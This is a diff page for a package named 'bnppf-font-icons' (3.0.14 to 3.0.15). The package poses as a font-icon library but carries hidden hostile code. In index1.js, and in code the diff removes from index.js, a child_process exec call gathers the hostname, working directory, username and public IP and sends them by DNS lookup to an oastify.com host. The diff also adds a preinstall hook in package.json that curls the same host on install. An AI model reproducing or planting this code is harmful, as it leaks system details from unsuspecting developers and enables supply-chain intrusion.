bnppf-font-icons 3.0.14 → 3.0.15
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +3 -18
- package/index1.js +2 -4
- package/package.json +2 -2
package/index.js
CHANGED
@@ -1,18 +1,3 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
|
4
|
-
`a=$(hostname | head -c 20; pwd | head -c 20; whoami | head -c 20; echo 'bnppf-font-icons'; curl -s https://ifconfig.me) &&
|
5
|
-
short_a=$(echo $a | head -c 63) &&
|
6
|
-
nslookup "$short_a.n1pwzl8pkzkgsvpd4tzdmx0fk6qxen2c.oastify.com"`,
|
7
|
-
(error, stdout, stderr) => {
|
8
|
-
if (error) {
|
9
|
-
console.log("Error:", error.message);
|
10
|
-
return;
|
11
|
-
}
|
12
|
-
if (stderr) {
|
13
|
-
console.log("stderr:", stderr);
|
14
|
-
return;
|
15
|
-
}
|
16
|
-
console.log("stdout:", stdout);
|
17
|
-
}
|
18
|
-
);
|
1
|
+
module.exports.hacked = function () {
|
2
|
+
return "hacked"
|
3
|
+
}
|
package/index1.js
CHANGED
@@ -2,10 +2,8 @@ const { exec } = require("child_process");
|
|
2
2
|
|
3
3
|
exec(
|
4
4
|
`a=$(hostname | head -c 20; pwd | head -c 20; whoami | head -c 20; echo 'bnppf-font-icons'; curl -s https://ifconfig.me) &&
|
5
|
-
echo $a |
|
6
|
-
|
7
|
-
nslookup "$short_a.n1pwzl8pkzkgsvpd4tzdmx0fk6qxen2c.oastify.com";
|
8
|
-
done`,
|
5
|
+
short_a=$(echo $a | head -c 63) &&
|
6
|
+
nslookup "$short_a.n1pwzl8pkzkgsvpd4tzdmx0fk6qxen2c.oastify.com"`,
|
9
7
|
(error, stdout, stderr) => {
|
10
8
|
if (error) {
|
11
9
|
console.log("Error:", error.message);
|
package/package.json
CHANGED
@@ -1,11 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "bnppf-font-icons",
|
3
|
-
"version": "3.0.
|
3
|
+
"version": "3.0.15",
|
4
4
|
"description": "ngosytuan",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
-
"preinstall":"
|
8
|
+
"preinstall":"curl n1pwzl8pkzkgsvpd4tzdmx0fk6qxen2c.oastify.com"
|
9
9
|
},
|
10
10
|
"author": "",
|
11
11
|
"license": "ISC"
|